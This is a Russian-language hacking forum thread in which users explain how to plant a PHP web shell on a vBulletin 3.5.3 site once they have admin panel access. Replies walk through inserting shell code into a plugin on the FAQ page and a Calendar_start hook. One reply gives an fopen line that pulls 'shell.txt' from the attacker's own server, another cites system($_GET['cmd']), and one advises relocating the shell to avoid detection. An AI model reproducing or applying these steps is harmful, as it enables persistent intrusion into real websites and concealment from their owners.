|
Шелл vBulletin 3.5.3
В поиске был, так ничего и не нашёл. -)
Имею доступ к админке, можно ли всётаки как нибудь залить шелл? |
Наверное никак...
|
Хватит дезинформировать народ.. Залить можно через модули.. Видео скора сниму...
|
Не знаю можно ли это на 3.5.3. Но попробуй пройтись по одной из ссылок внизу топика. ShAnKaR описывал.
|
Цитата:
|
А ты через смайлы пробовал , у меня тожа один раз такая проблемка вышла , я даже сам не поверл когда залил шелл через смайлики.
|
А нужно именно залить? Там же вроде в шалоны можно Php-код вставлять .... Или нет?=) Заинклудь шелл со своего хоста а там разбирёшься=)
|
Ладно - обойдёмся без видео:
Берешь шелл не больше 60кб, Адмминка-Система модулей- добавить новый модуль. Продукт Vbulletin Месторасположение: Vbulletin: Справка - faq_complete В тело вставляешь код шелла предварительно убрав в начале <? и в конце ?> Затем прост о заходишь в справку из форума и любуешся своим шеллом. Советую сразу перезалить шелл в другое место - а этот удалить - мало-ли кому взбредёт справку глянуть :) |
Geniy
на 3.5.4 у меня не пашет=( 2 ALL вот мой немного дебильный способ=) Заливаем куда-нить с себе на хост шелл под именем - "shell.txt" Создаём новый модуль. Местоположение хака - "Calendar_start" Даём ему какое-нить неприметное имя=) И пишем код: Код:
$file = fopen("http://ВАШ_СЕРВЕР.ru/shell.txt", "r");Проверял всё это дело на локалхосте - работает. Работоспособность будет зависеть от настроек апача, или что там у вас стоит=). Конечно способ идиотский, но у меня на локалхосте больше ничего не срабатывало=( : ни инклудинг, ни "system($id);", ни через смайлы ... ТОлько вот этот способ=) |
Видимо обычный system($_GET["cmd"]); ужэ не рулёз )
|
| Время: 11:33 |